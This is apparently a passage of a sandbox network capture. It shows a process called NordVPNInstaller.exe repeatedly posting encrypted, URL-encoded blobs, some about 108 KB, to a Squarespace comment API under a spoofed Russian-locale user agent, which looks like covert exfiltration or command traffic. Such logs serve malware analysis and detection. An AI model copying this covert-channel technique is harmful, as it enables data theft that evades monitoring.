2024-09-01 19:56:19 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:19 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdcWbpNanTDGOTc4MDZlM2E3YTM2NDNkYzQ3MzIxMWE4NTlmNWU2; Path=/; Secure Set-Cookie: crumb=BRUPFtcElLdxNTBiN2M5YTRlOTQxOGI5MTk4OWRhNDM5ZGRhYWY0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: oTOqp0D8/Xz93iFrP Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRUPFtcElLdxNTBiN2M5YTRlOTQxOGI5MTk4OWRhNDM5ZGRhYWY0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49767	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:19 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:19 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:19 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:19 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bfz_s_nXA_YlNmMwYzQzMmIyMTdhZmVmYzZjNmNmYTUwOTI3ZDli; Path=/; Secure Set-Cookie: crumb=BRHyA0jLePB5ZjFiZTdiMDE0MTQ0MDQyZjcyY2Y1NDRjZTQ0ZTEy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: zUtc8Pl0/bju0wQkZ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRHyA0jLePB5ZjFiZTdiMDE0MTQ0MDQyZjcyY2Y1NDRjZTQ0ZTEy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49768	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:19 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:19 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 4d 6e 47 6a 74 34 59 52 76 42 58 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YxMnGjt4YRvBXbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:19 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:19 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:19 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:19 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:20 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:19 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUrb8oc3enEMNGE1OWUzZDc4ZjQwYjNmODY0ZWRiNTRmNDZkNWNl; Path=/; Secure Set-Cookie: crumb=BRvkd1bt7QrtOTQwMGJjZjJmMmUwNTc5YTViMTNlMzQ3OWE5MmZj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: gNde1Ykm/X84Hf1rI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRvkd1bt7QrtOTQwMGJjZjJmMmUwNTc5YTViMTNlMzQ3OWE5MmZj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49769	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:19 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:19 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:19 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:20 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:19 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZLtIcS4eYO-YWVlMDg0ZTk4ODA3OGQ0NjdlZDNkNmY2N2VhNTYy; Path=/; Secure Set-Cookie: crumb=BTYe3IieCSLHZDZiNmNlNjY3YWI5YTkzYjhiMmE4MDJhOTk1MmUz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: VdzL3irb/m8NgiUHq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTYe3IieCSLHZDZiNmNlNjY3YWI5YTkzYjhiMmE4MDJhOTk1MmUz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49770	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:20 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:20 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:20 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:20 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:20 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbeHEXdEvFdsMDYzMGE3NTBkOGNkYjY1YTAwYjM5NDZhNmJkMGVi; Path=/; Secure Set-Cookie: crumb=BTZ6Rj9DDlqPMDRiYzQ1YThjNDE4NjA2Y2QxMTMyMzZhZmIwNDgy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: UH9WcohX/ktG8TW23 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTZ6Rj9DDlqPMDRiYzQ1YThjNDE4NjA2Y2QxMTMyMzZhZmIwNDgy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49771	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:20 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:20 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:20 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 77 56 56 34 4c 36 39 32 49 78 4b 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YwVV4L692IxKnbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:20 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:20 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:20 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:20 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:20 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:20 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:20 UTC	1	OUT	Data Raw: 64 Data Ascii: d
